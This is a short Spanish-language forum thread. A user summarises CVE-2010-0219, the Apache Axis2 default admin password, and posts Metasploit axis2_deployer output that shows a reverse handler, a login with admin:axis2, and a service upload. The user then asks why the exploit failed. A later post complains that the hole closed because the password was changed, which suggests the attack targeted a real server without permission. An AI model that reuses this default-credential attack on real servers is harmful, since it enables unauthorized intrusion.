ruben_linux Posted August 30, 2012 Share Posted August 30, 2012 Titulo: ==== CVE-2010-0219 Tipo: === Gestión de credenciales Gravedad: ====== Alta Fecha de publicación: ============= 18/10/2010 Referncias: ======= This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up descriptcion: ======== Apache Axis2, tal como es utilizado en dswsbobje.war en SAP BusinessObjects Enterprise XI v3.2 y otros productos, tiene una contraseña por defecto de axis2 para la cuenta admin, lo que facilita a atacantes remotos ejecutar código arbitrario subiendo al servidor un servicio web modificado. This is the hidden content, please Sign In or Sign Up Y esta es la respuesta de metasploit. Alguien me la puede explicar. El exploit como todos los de metasploit esta en Ruby y no entiendo, asi que por mas que "miro" el codigo no veo donde puede estar el fallo. msf exploit(axis2_deployer) > exploit [-] Handler failed to bind to xxx.xxx.xxx.xxx:4444 [*] Started reverse handler on 0.0.0.0:4444 [+] This is the hidden content, please Sign In or Sign Up [Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 mod_jk/1.2.18 PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8] [Axis2 Web Admin Module] successful login 'admin' : 'axis2' [*] Successfully uploaded [*] Polling to see if the service is ready msf exploit(axis2_deployer) > Pienso que por aqui puede estar la respuesta. Si algien puede ayudarme.... This is the hidden content, please Sign In or Sign Up :-ayuda-: Link to comment Share on other sites More sharing options...
ruben_linux Posted August 31, 2012 Author Share Posted August 31, 2012 Re: Cve-2010-0219 :-(( solo duro un dia la vuln. Ya cambiaron la pass Link to comment Share on other sites More sharing options...
Recommended Posts